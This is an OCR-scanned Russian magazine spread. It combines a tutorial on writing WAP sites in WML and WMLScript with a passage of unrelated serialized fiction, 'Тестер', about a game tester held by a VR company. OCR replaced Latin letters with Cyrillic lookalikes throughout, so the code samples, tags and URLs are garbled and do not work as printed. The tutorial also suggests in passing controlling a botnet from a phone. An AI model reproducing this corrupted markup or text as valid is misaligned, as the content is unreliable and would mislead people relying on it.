С МОБИЛЬНИКА!». ИХ СУТЬ ЗАКЛЮЧАЕТСЯ 
В ТОМ, ЧТО ТЕБЕ НАДО ОТОСЛАТЬ ПЛАТНОЕ 
СМС ПО ОПРЕДЕЛЕННОМУ НОМЕРУ. ПОТОМ 
ОПЕРАТОР ЗАЧИТАЕТ ТЕБЕ СООБЩЕНИЕ. ЭТО 
НЕ ТОЛЬКО НЕУДОБНО, НО И НЕ БЕСПЛАТНО. 
ДА И ИМЕЕТ ЛИ СМЫСЛ ПОЛЬЗОВАТЬСЯ ЭТИМИ 
УСЛУГАМ, ЕСЛИ В ТВОЕМ РАСПОРЯЖЕНИИ 
ЕСТЬ ТАКИЕ ВЕЩИ, КАК МОБИЛЬНИК С 
ПОДДЕРЖКОЙ ѴѴАР И НАВЫКИ КОДИНГА 
НА ѴѴМІ_? ЧТО Ж, МОБИЛЬНИК — В КАРМАНЕ, 

А КАК КОДИТЬ НА ѴѴМІ_ Я СЕЙЧАС ПОКАЖУ 

I Дмитриев Данил ака хЫІ (5Ігеат@озкоІпеІги, 334437228) 




ѴѴАР (ѴѴігеІезз Арріісаііоп Ргоіосоі) — это протокол, разработанный спе- 
циально для мобильных устройств. Именно через него происходит пере- 
дача ѴѴМІ_-страниц. ѴѴМІ_ — технология создания ѴѴАР-контента. Явля- 
ется разновидностью языка разметки ХМІ_, со всеми вытекающими от- 
сюда последствиями. Если ты раньше кодил на ХМІ_ или НТМІ_, то ниче- 
го нового ты тут не увидишь, за исключением, пожалуй, тэгов организа- 
ции блочных структур и вставок кода на ѴѴМІ_8сгірІ. Единственное надо 
запомнить, что все тэги в ѴѴМІ_ должны быть закрытыми. Если ты име- 
ешь дело с тэгами, которые не имеют закрывающего партнера, напри- 
мер <Ьг>, то следует писать <Ьг /> (самозакрывающийся тэг). 

Исходя из того, что ѴѴМІ_ — разновидность ХМІ_, первая строчка кода 
мобильной паги будет указанием на стандарты ѵѵЗ.огд: 

<?хтІ ѵег5іоп="1.0"?> 

сЮОСТѴРЕ ѵѵті РІ^ЫС Ѵ/ШРЕОКШ/ОТО ѴѴМІ_ 1.1//ЕІМ" 
"ІіНрУМѵѵѵѵ.шрІогит.огд/ОТОМтМ .1 .хтІ"> 

Вышеуказанная строка является обязательной, и именно с нее должна начи- 
наться любая ѵѵар-страница. Далее идет непосредственно тэги самого языка. 



Рассмотрим следующий код: 

СѴѴГТіЬ 

<сагсІ іс!="!іоте" ІШе="ѴѴеІсоте"> 

<р аІідп="сепІег">Содержимое нашей страницы 
выровненное по центру<Ьг/> 

<ітд 5гс="Іодо.ѵѵЬтр" аН="!іоте"/хЬг/> 

<с1о Іуре="ассерГ ІаЬеІ="пехГхдо ИгеТ="#сагсІ1 "/></сІо></р> 
</сагсІ> 

<!-Текст комментария --> 

<сагсІ ісІ="сагсІ1 " ІШе="Раде 1"> 

<р>ТЫ$ І5 Ше Іігзі сагсІ.</р> 

<сіо Іуре="ассерГ ІаЬеІ="пехГхдо ГігеТ="#сагсІ2"/></сІо> 

<сіо 1уре="ргеѵ" ІаЬеІ="Ьаск"хргеѵ/х/сіо> 

</сагсІ> 

</ѵѵтІ> 




Первый тэг <ѵѵтІ> указывает, что данная страничка разработана с ис- 
пользованием именно этого языка разметки. Замечу, что этот тэг яв- 
ляется обязательным и опускать его не следует. Далее идет тэг 
ссагсЬ. Как известно, мобильные устройства обладают небольшой 
пропускной способностью и, следовательно, заставлять каждый раз 
пользователя ждать загрузки страниц — дело нехорошее. Поэтому в 
ѴѴМІ_ есть возможность загрузить сразу одну большую страничку и 
разделить ее с помощью тэгов <сагб> на маленькие, по которым уже 
будет перемещаться пользователь. Злоупотреблять этими тэгами 
нельзя, так как память у телефона не резиновая, и твоя страница мо- 
жет попросту не поместиться, или загружаться так долго, что пользо- 
ватель предпочтет соседний проект. Так что не повторяй ошибку но- 
вичков — не пихай в одну страницу весь сайт. К слову, об объемах. 
Старайся размещать информацию так, чтобы финальный размер 
страницы не превышал 1,4 кб. Если необходимо запихнуть какой-ли- 
бо текст, то максимально сократи его, так как читать с маленького эк- 
рана и все время листать вниз — просто неудобно. 






Для тэга <сагб> справедливы следующие события: 

ОпепІегЬаскѵѵагсІ — срабатывает при выборе элемента "ргеѵ" 

Опепіеііопл/агсі — при вызове карты 

Опіітег — по истечении времени у элемента "Іітег". 

Теперь давай рассмотрим атрибуты этого тэга. ІсІ — это идентифика- 
тор блока сайта. Он нужен для перехода из одной части документа в 
другую. Ссылка на карточку состоит из символа «#» и значения ее ат- 
рибута ІсІ (#сагсІ123). Атрибут МІе указывает на заголовок сайта (мо- 
жет появиться в списке ранее посещенных страниц, а также в любом 
другом месте по усмотрению браузера мобильного телефона). Он вы- 
полняет те же функции, что и одноименный тэг в языке НТМІ_. У тэга 
<сагб> есть еще два атрибута: пеѵѵсопіехі, который может быть ис- 
пользован для того, чтобы сбросить состояние деки (дека, она же ко- 
лода — в нашем случае страничка, состоящая из карточек), и огбегесі, 
который сообщает мобильному браузеру, принадлежит ли эта карта к 
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упорядоченному списку карт или нет. Разработчики могут использо- 
вать последний атрибут по своему усмотрению и разрабатывать либо 
деку с последовательным просмотром карточек, либо состоящую из 
одной большой карточки. 

Следующая строчка в комментариях, по-моему, не нуждается, так как все 
понятно. Вывод текста по центру с переводом на новую строку: <р 
аІідп="сепІег">ТаІег І з НР<Ьг/>. Кстати, о комментариях. В языке ѴѴМІ_ они 
обозначаются так же, как и в НТМІ_: <!-Текст комментария ->. Вслед за вы- 
водом текста наша ѵѵті-страничка выведет на экран картинку в формате 
ѵѵЬтр: <ітд згс="Іодо.ѵѵЬтр" аК="Ьоте7><Ьг/>. Пояснять атрибуты, я думаю, 
не стоит, так как все и так понятно: згс="Іодо.ѵѵЬтр указывает на располо- 
жение картинки, а атрибут а\Х — на текст-описание, так что все, как в НТМІ_. 
Другой вопрос — графика. Формат ѵѵЬтр (ѴѴігеІезз ВМР) разработан специ- 
ально для использования в приложениях, предназначенных для беспровод- 
ных устройств. Этот графический формат имеет всего два цвета (черный и 
белый). В Интернете можно достать несколько дюжин программ для созда- 
ния картинок в формате ѵѵЬтр (к примеру, на ѵѵ\/№.шрІідег.сот/Ьтр2ѵѵЬтр/ 
есть замечательный онлайн-интерфейс для преобразования обычных Ьтр- 
карти нок в ѵѵЬтр — прим. Коляна). 




браузеру на необязательность по- 
каза этой кнопки в случае, если 
атрибуту присвоено значение *ше. 
Тэг <до> содержит информацию о 
том, на какую карту следует перейти 
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почтовый сервис МаіІ.ги давно обзавелся мобильным интерфейсом 



ѵѵар-сайт одного из операторов связи 



— 




в Сети много частных ѵѵар-сайтов 



после выполнения <сіо> (это переход на карту, содержащую метку #сагсІ1). 
Тэг <до> имеет следующие атрибуты (параметры тэга): 

Ыеі — ІІВІ_. 

зепсігеіегег — этот атрибут необходим серверу в списках контроля дос- 
тупа. Его значение указывает браузеру на то, что необходимо отослать 
на сервер ІІВІ_ минимально возможной длины. 

теИіосІ — может принимать значение либо розі, либо деі. Значение ана- 
логично НТМІ_ (розі и деі — это методы передачи параметров). 
ассері-сНагзеІ — указывает кодировку, в которой браузер мобильника 
должен будет посылать ссылку. 

Так что все предельно просто. Наш первый ѵѵар-сайт, наша колода сос- 
тоит всего из двух карт. Но это далеко не предел — ты можешь создать 
документ, необходимой тебе структуры, и единственное, что тебя огра- 
ничивает, — рамка в полтора килобайта веса финальной страницы (все- 
го-то — прим. Кол я на). 

[основные ѴѴМ1_-конструкции] Если ты хочешь в совершенстве 
знать язык разметки для мобильных устройств, то должен освоить язык 
ХМІ_ или НТМІ_. Соблюдая нормы этих языков, с учетом поправок стан- 
дарта ѴѴ МІ_, ты сможешь создавать правильные ѴѴАР-сайты. Далее 
представляю твоему вниманию основные конструкции языка, особен- 
ности которых надо учитывать во избежание ошибок. 

СОБЫТИЯ 

Понятие о событиях, я думаю, ты уже имеешь. События есть практичес- 
ки в каждом языке программирования — это действия, производимые в 
зависимости от определенных условий, — клика пользователя по ссыл- 
ке и т.д. Например, в языке ѴѴМІ_ есть элемент Опеѵепі, который обла- 
дает атрибутом Іуре. В этом атрибуте задается одно из четырех возмож- 
ных событий: 

опепіегЬаскѵѵагсІ — срабатывает при выборе элемента ргеѵ. 
опепіегіогѵѵагсі — при вызове карты 
опріск — при выборе опции в списке элемента зеіесі 
опіітег — по истечении времени у элемента Іітег. 

Вот пример кода с использованием событий: 

<?хтІ ѵегзіоп= ,, 1.0"?> 

сЮОСТѴРЕ ѵѵті РІІВЫС "-//ѴѴАРРОВІІМ/ЛЭТО ѴѴМІ_ 1.1//ЕІЧ" 
"Ііир://ѵѵѵѵѵѵ.ѵѵарІогит.сот/ОТО/ѵѵтІ_1 .1 .хтГ> 

<ѵѵтІ> 

ссагсі ісІ="5Іаі1"> 

<сіо Іуре="ассерГ> 

<до Пге{=7ѵѵо7> <!- Указывает на переход к метке «Сѵѵо» -> 

</сіо> 

<р>СНоозе АссерІ.</р> 

</сагсІ> 

ссагсі ісІ=7ѵѵо"> <!- сама метка «Сѵѵо» ~> 
ссіо Іуре="ассерГ> 

<до ИгеІ=7Игее7> 

</сіо> 

сопеѵепі Іуре="опепІегЬаскѵѵагсГ> <!- описание события -> 

<ргеѵ/> 

</опеѵепІ> 

<р>СІіоозе АссерС</р> 

</сагсІ> 

ссагсі ісІ="Фгее"> 
ссіо Іуре="ассерГ> 
сргеѵ/> 
с/бо> 

ср>СІіоозе АссерС.</р> 

с/сагб> 

с/ѵѵтІ> 



СТРУКТУРА 

В языке ѴѴ МІ_ есть такое понятие, как структура. При помощи структур 
ты можешь запретить или разрешить юзеру зайти на определенные 
страницы или даже сайты. В самом сайте делается это с помощью эле- 
мента Ассезз, который имеет следующие атрибуты: 
сіотаіп — имя домена для запрета доступа. Мобильный браузер будет 
просматривать и сравнивать со значением этого атрибута все имена до- 
менов, встречающихся в документе. К примеру, встретив строку "сассезз 
сІотаіп="тоІогоІа.сот І 7>", браузер сможет зайти на ѵѵтѵ.тоіогоіа.сот, но 
не сможет зайти на ѵѵѵѵѵѵ.гоіа.сот или на ѵѵѵѵѵѵ.тоіогоіа.пеі. 
раІН — путь для сравнения. Работает так же, как и атрибут домена. Так, 
если "сассезз раФ=7іпІегпаІ7>" путь 7іпІегпаІ/ѵѵтГ пройдет проверку, то 
УіпІегпаІ-ѵѵтГ — нет. 

Элемент Ассезз с примерно такими атрибутами: "<ассезз сІотаіп="тоІогоІа.сопл" 
раІН=7зріп7>" разрешит ссылку на деку только со следующих адресов: 

ИІІрУМѵѵѵѵ.тоІогоІа.сот/зріп/деІиісі.сді 
ИІІрзУМѵѵѵѵ.тоІогоІа.сот/зріп/іпсіех.ѵѵтІ 
ііПрУМѵѵѵѵ.тоІогоІа.сот/зріп/* ********* 

А с этих запретит: 

ІШр ѴЛллллл/ . т оі со т/8 р і п/д еіи і сі . сд і 
ИІІр:/М\л/\л/.тоІогоІа.сот/іпІегпаІ/8ріп/деІиісІ.сді 

В качестве примера использования структур приведу более сложную, 
чем раньше, деку: 

<?хтІ ѵег8іоп="1.0"?> 

сЮОСТѴРЕ ѵѵті РОВНО "-/ЛЛ/АРРОРЮМ/ЮТО \Л/МІ_ 1.1//ЕІМ" 
м [іПр:/М\л/\л/.\А/арІогит.огд/ОТО/\л/тІ_1 .1 .хтІ"> 

<ѵ\/тІ> 

сііеасЬ 

сассезз сіотаіп="тоІогоІа.сот" раІІі="/зріп"/> 

с/ИеасІ> 

сІетріаІе> 

ссіо Іуре="ассерГ пате="ассерП" ІаЬеІ="0К"> 

сдо РгеІ="#ассерГ/> 

с/сіо> 

сЛетріаІе> 

ссагсі ісі="зІагГ М1е="31аі1 Неге"> 

<Р> 

Зіагі Неге. 

с/р> 

с/сагсі> 

ссагсі Ш="ассерГ ІШе="0кау Сагсі"> 

ссіо Іуре="ассерГ пате="ассерГІ" ІаЬеІ="0кау"> 

сдо РгеІ="#ассер12"/> 

с/сіо> 

<Р> 

Сагсі Ассері 

с/р> 

с/сагсі> 

ссагсі ісі="ассер{2" ІШе="0К Сагсі" > 
ссіо Іуре="ассерГ > 
сдо Ііге!="#з1аі1" /> 
с/сіо> 

<Р> 

Сагсі Ассер12 

с/р> 

с/сагсі> 

сМт1> 









[ѴѴМІ_8сгір(] Если ты хочешь создать что-то реально хорошее, то тебе 

не обойтись без библиотек, встроенных в спецификацию протокола ѴѴАР 

1.1. Всего библиотек шесть: преобразование булевых, целых и обычных 

переменных (І_АІ\Ю); 

операции с плавающей точкой (РІ_ОАТ); 

операции со строками (ЗТВІЫО); 

манипуляции с абсолютными и относительными ІІРІ_ (ІІВІ_); 
взаимодействие с ѴѴМІ_-браузером (ѴѴМІ_Вгоѵѵзег) 
и пара основных функций интерфейса пользователя (01А1_0(33). 

Давай разберемся с тем, как работать с этими библиотеками в процес- 
се создания несложной игры тадіс зциаге, в которой игрок помещает 
целые числа в квадратную матрицу, следя за тем, чтобы сумма чисел в 
столбцах равнялась сумме в строках. Итак, создадим ѴѴМІ_-документ и 
назовем его тадіс.ѵѵті. Он будет содержать весь интерфейс пользова- 
теля и логику игры. А также создадим второй файл тадіс.ѵѵтіз, в кото- 
ром будут содержаться все вычисления. 

Для начала мы должны описать взаимодействие между основными эле- 
ментами пользовательского интерфейса и функциями ѴѴМІ_ЗсгірІ (то 
есть функциями наших библиотек). 

Создадим деку. Она сначала будет спрашивать у игрока позицию и зна- 
чение целого числа, которое будет помещено в массив, а затем будет 
вызывать функцию для того, чтобы положить этот элемент в массив. Ни- 
же я привожу пример кода деки, вызывающей функцию. Обрати внима- 
ние, что когда игрок нажмет кнопку ОК, чтобы ввести значение, наша 
дека вызовет функцию РогтВоѵѵ, находящуюся в /тадіс.ѵѵтіз. 

<\Л/тІ> 

ссагсі Ш="5ІаіТ> 

<сіо 1уре="ассерГ ІаЬеІ="51аД"> 

<до ІігеІ="#ѲеІРо5Шоп"> 

<зеІѵаг пате="соІ" ѵаІие="" /> 

<зеІѵаг пате="ѵаІие" ѵаІие="" /> 

<зеІѵаг пате="го\л/1" ѵаІие="1,2,3,4,5" /> 

<зеІѵаг пате="сІі5го\л/1" ѵаІие="> 0 0 0 01 0" /> 

</до> 

</сіо> 

<Р> 

Прикольный текст 

</р> 

</сагсІ> 

ссагсі Ш="6е{Ро5Шоп"> 
ссіо Іуре="ассерГ ІаЬеІ="0К"> 

<до ІігеІ="#6еІѴаІие"/> 

</сіо> 

<Р> 

Соіитп (1 —4): 

сіприі пате="соІ" {огтаІ="І\І"/> 

</р> 

</сагсІ> 

ссагсі ісі="0іеІѴаІие"> 

ссіо Іуре="ассерГ ІаЬеІ="0К"> 

сдо РгеІ="./тадіс.\А/тІ5#РогтВо\А/()" /> 

с/сІо> 

<Р> 

Ѵаіие (1—100): 

сіприі пате="ѵаІие" {огтаІ="*І\І"/> 

с/р> 

с/сагсІ> 

Теперь нам нужно создать саму функцию. Файл тадіс.ѵѵтіз должен на- 
ходиться в той же директории, что и основной тадіс.ѵѵті. Объявляем в 
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тадіс.ѵѵтіз функцию РогтВоѵѵ типа ехіегпаі. Как раз из нее мы и будем 
взаимодействовать с ѴѴМІ_-декой посредством библиотеки ѴѴМІ_Вгоизег, 
которая позволяет нам получать и устанавливать значения переменных 
в ѴѴМІ_-документе «на лету». 

Следующий модуль объявляет внешнюю функцию, которая получает пе- 
ременные из деки (в нашем случае — тадіс.ѵѵті), устанавливает пере- 
менную для деки дисплея, указывая на отображаемую на дисплее деку, 
и затем обновляет дисплей пользователя. Обрати внимание, что опера- 
торы в ѴѴМІ_-деке — все в нижнем регистре: 

сзеіѵаг пате="соГ ѵаіие /> 

Присваивать значение переменной через ѴѴМІ_Вгоизег нужно следую- 
щим образом: 

ѴѴМІВгоѵѵзег.зеІѴагС'соІ", 

Теперь, когда мы увидели основные взаимодействия, давайте добавим 
к функции манипулирование со строками. Спецификация ѴѴМІ_ЗсгірІ 
включает библиотеку Зігіпд, которая, среди других особенностей, позво- 
ляет обрабатывать переменную, как одномерный массив строки. Все, 
что надо сделать, — это обозначить текстовый разделитель, чтобы вы- 
водить строку на дисплей в форматированном виде. 

В конечном счете, нужно вставить значение, введенное игроком, в мас- 
сив, и при том, чтобы в массиве оно содержалось именно в той позиции, 
которую задал игрок. Следующий кусок кода показывает, как мы будем 
вычислять индекс в массиве, и помещать туда нужное значение. Пока 
мы пропустим преобразование в колонке, просто будем вносить значе- 
ния в массив элементов, начиная с нулевого. Вот код финального при- 
ложения (в подготовке программы и описания технологии ѴѴМІ_ЗсгірІ ав- 
тор обращался к работам Кевина Шарпа): 

ехіегп Іипсііоп РогтВоѵѵ () { 

ѵаг соі = ѴѴМІ-Вгоѵѵзег.деІѴаг ("соі"); 
ѵаг ѵаі = ѴѴМІ_Вгоѵѵзег.деІѴаг ("ѵаіие"); 
ѵаг гоѵѵіѵаіз = ѴѴМІ-Вгоѵѵзег.деІѴаг ("гоѵѵі"); 
ѵаг Іосаісіізгоѵѵ; 
ѵаг Іосаігоѵѵѵаіз; 

гоѵѵіѵаіз = ЗІгіпд.іпзегШ(гоѵѵ1ѵаІ5, ѵаі, 0, 

ѴѴІѴПВгоѵѵзег.зеІѴаг ("сіізгоѵѵі", гоѵѵіѵаіз); 

ѴѴІѴПВгоѵѵзег.зеІѴаг ("гоѵѵі", гоѵѵіѵаіз); 

ѴѴІѴПВгоѵѵзег.до ( "тадіс.ѵѵтІ#0і5рІауВе5иИ" ); 
Ѵ\/МІВгоѵѵзег.геТгезІп(); 

} 

[собственные проекты на ѴѴМІ.] Как применить полученные зна- 
ния на практике ты, конечно, придумаешь, но я все-таки предложу пару 
вариантов. Первое, что приходит в голову, — это личный портал. Ска- 
жем, с доступом к почтовому ящику (ІіѵеригпаІ-аккаунту) ну, и еще что- 
нибудь такое же интересное. Потом для владельца ботнета наверняка 
будет нелишним доступ ко всем его мощностям с мобильного телефона 
— нажал пару кнопочек на мобиле и тысячи ботов все как один нача- 
ли... в общем, чем-нибудь полезным занялись. Придумать можно 
действительно очень много всего. Имея доступ в Сеть и владея связкой 
РНР/РегІ + ѴѴМІ_, ты сможешь существенно расширить возможности сво- 
его мобильного и сделать свою жизнь гораздо интересней © 
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Тестер 



Часть вторая 

Письмо оказалось, мягко говоря, неожиданным. 
Андрей открыл глаза и невольно зажмурился сно- 
ва. С потолка на него лился яркий свет лампы. Он 
попытался приподнять голову и оглядеться, но тут 
же ощутил, как череп сдавили невидимые тиски бо- 
ли. Память постепенно возвращалась. Меза, всад- 
ник, продавщица в магазине, подземный король, 
Жорка. . . и черная бездна. 

— Прости, Леон перестарался, — услышал Анд- 
рей рядом знакомый голос. — Боль скоро прой- 
дет, всего лишь небольшое сотрясение. 

Он с трудом повернул голову и увидел Олега 
Николаевича. Сотрудник «ВР Инсайд» сидел в 
кожаном кресле и курил, наблюдая за ним. 

— Где я? — спросил Андрей. 

— У нас в компании. Произошел непредвиден- 
ный инцидент, не последнюю роль в котором 
сыграл ты, Андрей. Нам нужна твоя помощь, 
чтобы во всем разобраться. 

— Поэтому вы проломили мне голову и прита- 
щили сюда? 

— Ты набросился на нашего работника... 

— Что за бред? Ни на кого я не набрасывался. 

— Разве не помнишь? Ты словно взбесился, 
хватал все, что попадало под руку. Пришлось 
тебя успокоить. 

Голова снова взорвалась приступом боли, 
и Андрей со стоном откинулся на лежак. 

— Ладно, лежи пока, отдыхай. И смотри не де- 
лай глупостей. Позже поговорим. 

Олег Николаевич вышел из комнаты, и Андрей 
остался наедине с собой. 

* * * 

Он смотрел в потолок и в свете лампы искал от- 
веты на свои вопросы. Зачем его притащили сю- 
да? Все это выглядело как похищение. Он ока- 
зался в просторной, но запертой комнате, на за- 
тылке ясно чувствовался ушиб... 

— Может, позвать на помощь? — пронеслась 
мысль. 

Андрей медленно поднялся с лежака и осмот- 
релся. Комната представляла собой обычный 
кабинет. Стол, на котором стоял компьютер, па- 
ра кресел, шкаф для документов, папоротник в 
горшке, несколько картин на стенах. Разве что 
медицинская койка, на которой он устроился, не 
вписывалась в интерьер. 

Андрей подошел к окну. По ту сторону стекла был 
обычный мир: тихий дворик, утопающий в зелени, 
проезжающие машины, идущие по своим делам лю- 
ди. Эта его немного успокоило. Если бы эти люди хо- 
тели причинить ему вред, они бы не оставляли его 
здесь. При желании можно было сигануть в окно, 
второй этаж всего. Хотя с побегом Андрей решил 
повременить. Слишком много еще было вопросов. 
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Он подошел к столу и замер. Компьютер был ЕГО СОБСТВЕННЫЙ. 
В этом не было никаких сомнений: те же знакомые пометки, наклейка на 
клавиатуре, царапины на мышке. А рядом лежал диск с «Мезой». Но зачем 
было тащить сюда его комп? Если они хотели, чтобы он снова окунулся в 
игру, то это можно было сделать на любом из компьютеров компании. Анд- 
рей нажал кнопку питания, машина привычно загудела, на экране появил- 
ся БИОС. Ничего не изменилось, даже обои на рабочем столе были преж- 
ними. Он задумчиво посмотрел на коробку. Похоже, Олег Николаевич соз- 
нательно подталкивал его вернуться в игру. Может быть, это поможет как- 
то решить тот инцидент, о котором он говорил? Взгляд Андрея перешел на 
шкаф, где книги соседствовали рядом с толстыми папками для документов. 
Дверца шкафчика оказалась незапертой, и Андрей вынул одну из папок. 
Внутри оказалось объемное досье с пометкой «Тестер #14». На фотке, 
прикрепленной к нему, Андрей узнал того парня с рыжей шевелюрой, кото- 
рого он видел на презентации. В папке было все: дата рождения, школа, в 
которой учился, отметки, которые получал, места работы, значительные со- 
бытия из жизни. Кто-то очень постарался, чтобы собрать всю информацию 
об этом человеке. Андрей вложил папку обратно и принялся искать. Она 
была в дальнем углу. Синяя папка, стянутая лентами. Внутри была вся его 
жизнь. Этой своей фотографии он никогда не видел, очевидно его сфотог- 
рафировали в один из нечастых моментов, когда он выходил на улицу. В 
папке были распечатки его переписки с ВРИ и другими геймдевелоперски- 
ми компаниями, некоторые посты из Интернета, ІСО-логи. Они даже знали 
про его виртуала, от имени которого Андрей иногда прикалывался на дамс- 
ких форумах. Андрей никогда не светил этого имени и о нем не знал даже 
Жорик. Он отложил папку и стал искать досье на друга. Пусто. Догадки, что 
Жорка тоже записался в компанию, остались догадками. 

Андрей закрыл шкаф. Когда вернется Олег Николаевич, ему придется 
объяснить все это. А пока... 

Он сел за компьютер, вставил диск с Мезой, надел очки и вошел в игру. 

* * * 

Сначала он подумал, что попал в центр сильнейшего урагана. Ветер ударил 
в лицо так сильно, что перехватило дыхание. Только через мгновение он 
понял, что падает. Стремительно, с огромной высоты. Крик вырвался сам 
собой. Еще секунд 20 он летел, с ужасом ожидая гибели, но падение нако- 
нец закончилось, и он оказался в воде. Работая руками и ногами, Андрей 
ринулся к поверхности и только когда всплыл, смог перевести дыхание. 
Небо над головой было серое, сгущались тучи, все говорило о том, что 
скоро начнется гроза. Даже небольшого шторма достаточно, чтобы вол- 
ны затянули его на дно. Но, оглянувшись, Андрей заметил очертания ост- 
рова. Нужно было поторопиться. 



Андрей хорошо плавал. Когда-то давно они часто ездили с родителями 
на море, где отец научил его держаться в воде и не бояться утонуть. По- 
этому сейчас он боялся не глубины, а шторма, против которого не усто- 
ит даже самый опытный пловец. Чем ближе становился остров, тем 
больше сгущались тучи. Когда до суши оставалось не больше километ- 
ра, хлынул дождь. Волны подхватили его, передавая друг другу, и по- 
несли на скалы. Когда очередная волна накрыла его с головой, Андрей 
уже полностью выбился из сил. 

Он пришел в себя уже на берегу. Шторм закончился, на море образовал- 
ся полный штиль. 

— Ты Андрей, да? 

Светловолосая девочка лет восьми, на которой из одежды были только 
пальмовые листья у пояса, с любопытством смотрела на него. 

— Андрей, — удивился он. 

— А я тебя знаю! 

— Откуда? 

— А ты смешной, — сказала девочка и звонко засмеялась 

— Я — Кристи — представилась она, — А это Лика. 

Только сейчас Андрей обратил внимание, что за худенькой ножкой девоч- 
ки прячется бурундук. 

— Лика, это Андрей! — бурундучок высунул мордочку, принюхался и сно- 
ва спрятался за хозяйку. 

— Он боится, что ты заберешь его обратно. Но ты ведь будешь, правда? 

— Я не понимаю, о чем ты. 

— И не нужно понимать. Главное, слушайся меня. Обязательно. Ладно, 
мне пора! До встречи! 

Прежде чем Андрей крикнул «подожди!», девочка уже скрылась в высту- 
пающей к берегу чаще леса. 

Андрей отправился следом за ней. Может быть, она из местного пле- 
мени. Будет лучше отыскать это племя, чем бродить в одиночестве 
по джунглям. А джунгли кругом были самые настоящие. Густые кус- 
тарники и высоченные деревья со свисающими лианами, стрекот 
птиц и визг обезьян, буйное разнообразие запахов... Выломав с де- 
рева ветку, он смастерил из нее примитивную дубинку и отправился 
дальше. Чем больше он отходил от берега, тем больше сгущались 
деревья. Когда Андрей уже хотел поворачивать обратно, он вдруг 
услышал людские голоса. Прибавив шагу, он вскоре увидел просвет 
через деревья. Голоса были совсем рядом. Вдруг земля под ногами 
Андрея провалилась, и он снова полетел вниз. Но на этот раз повез- 
ло меньше. На дне капкана его встретили заточенные колья, наск- 
возь пронзившие тело. Перед тем как снова окунуться во мрак, Анд- 
рей увидел рядом с собой человеческий скелет, в неестественной 
позе застывший между кольев. 




* * * 

Андрей снял очки и увидел рядом Олега Николаевича. 

— Не повезло, да? По глазам вижу. Людей, которые только что пережи- 
ли смерть в Мезе, можно вычислить запросто. Я сам не сразу отхожу, 
когда что-то случается. А случается часто. Наши страхи генерируют сю- 
жет так, что очень редко удается избежать печального конца. Кстати, ка- 
ким он был у тебя на этот раз? 

— Капкан на острове. 

— Любопытно. Может, это поможет тебе избежать гибели, если ты 
действительно окажешься на острове. По крайней мере, будешь смот- 
реть под ноги, — засмеялся мужчина. 

— Почему я здесь? И какого черта вы следили за мной? 

— Следил за тобой? С чего ты взял? 

Андрей кивнул в сторону шкафа. 

— А, это? Ты должен нас понять, Андрей. Проект серьезный, нам нужны 
люди, которым мы доверяем. А как мы можем доверять человеку, если 
его не знаем? 

— Вы понимаете, что слежка и подслушивание — уголовно наказуемы? 

— Да ладно тебе. Я надеюсь, ты не будешь зачитывать мне права? Все 
это делается для твоего же блага. 

— Ну конечно. Так что вы от меня хотите? 

Олег Николаевич достал из кармана фотографию и показал Андрею. 

— Знаешь этого парня? 

Еще бы он не знал. Жорка! 

— Наверное, уже в курсе, что с ним случилось? 

— А какое это отношение имеет к вам? 

— Георгий принимал участие в работе над проектом. 

— ЧТО!? 

Андрей ошарашено посмотрел на собеседника. 

— Знаю, для тебя это неожиданность, но по правилам контракта он не 
имел права говорить об этом с посторонними. Кстати, именно он пореко- 
мендовал тебя в тестеры. 

— А что., в смысле, кем он у вас работал? 

— Сейчас это уже неважно. Важно то, что каким-то образом, находясь в 
Мезе, ты влияешь на мир вне ее. 

— Вы хотите сказать, что Жора получил ожог из-за меня? 

— А ты сам так не считаешь? Все происходило на глазах его матери. Она 
заявляет, что ожоги взялись из ниоткуда. И ты ведь помнишь, что проис- 
ходило в тот момент с тобой. 

— А вы откуда знаете, что происходило? 

— Мы наблюдаем за всеми игровыми процессами наших тестеров. Это 
прописано в контракте, который ты подписывал. 



— Но как это возможно. . . влиять на реальную жизнь из игры? Бред какой-то. 

— Это нам и предстоит выяснить. Пойдем. 

* * * 

Они шли по коридору вдоль кабинетов. Другие сотрудники, проходившие 
мимо, с интересом поглядывали на него и вежливо здоровались. У Анд- 
рея было странное чувство, что они знают его уже не первый год. 

— Куда мы идем? 

— В нашу Центральную лабораторию. Мы хотим провести небольшой тест. 

— Тест? 

— Не беспокойся, это безболезненно. И совершенно безопасно. 

Когда они завернули за угол, Андрей остановился как вкопанный. Прямо 
перед ним стояла та самая девочка с острова. Правда, на ней было обыч- 
ное платье, да и бурундука рядом не было видно. Но это была она. 

— Привет, — только и мог произнести Андрей. 

Девочка не отвечала и смотрела на него не отрываясь. Что-то в этом 
взгляде было пугающее. 

— Это Александра, дочь одного из наших сотрудников. К сожалению, 
она не может говорить, но все равно умница, правда, Саша? 

Девочка не обращала на него внимания. Она протянула руку, и Андрей 
понял, что она хочет ему что-то передать. Он дал ей ладонь, Александра 
вложила в нее записку и тут же убежала. 

— Она у нас немножко странная. Раз в неделю приходит сюда, так как со- 
бирается в будущем тоже заниматься компьютерными играми. Мы ей раз- 
решаем наблюдать за работой. Что она тебе передала? 

Андрей раскрыл клочок бумажки. На ней детским почерком было выведено: 

«Не верь им. Беги!». 

— Любовная записка? — поинтересовался Олег Николаевич и придви- 
нулся, чтобы посмотреть. Андрей смял бумажку и сунул ее в карман. СО 

— Ничего интересного. ^ 

— Ладно, пошли тогда. Тем более что мы уже почти на месте. 

* * * 

В Центральной лаборатории большую часть помещения занимала здоро- 
венная махина, напичканная разной электроникой. За ней присматрива- 
ло несколько человек, еще пара сотрудников компании сидели за подк- 
люченными терминалами. о 

— Эту машину мы соорудили сами. Для наблюдения за физическими и ^ 

психологическими показателями играющих. Особенно нас интересует <м 

мозговая активность. о- 

ш 

— Вы собираетесь к моему мозгу подключить это чудовище? * 

— Как я уже сказал, процедура безболезненная. Ты будешь находиться Л. 
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в Мезе, мы будем за тобой наблюдать. Только таким образом можно уз- 
нать, что случилось с тобой и твоим другом. Я подозреваю, что есть ка- 
кая-то аномалия... 

— Я думал, вы достаточно наблюдали за мной и другими ребятами. 

— Мы получали информацию о твоих игровых процессах, но что на самом 
деле творилось у тебя в голове, для нас — загадка. Именно мозг констру- 
ирует мир, программа — лишь инструмент управления твоими видениями. 
— Значит, все, что я вижу, заходя в игру, — это мои галлюцинации? 

— Ну, можно и так сказать. Но я бы предпочел слово «фантазии». 

— А как вы контролируете эти фантазии? 

— Никак. Ты сам их контролируешь. Поэтому мир Мезы для каждого свой. 
— Но ожоги... это ведь не фантазии? 

— Нет. Поэтому ты здесь. 

К ним приблизился пожилой мужчина в нелепо сидящем костюме и толс- 
тенных очках — типичный чокнутый ученый. 

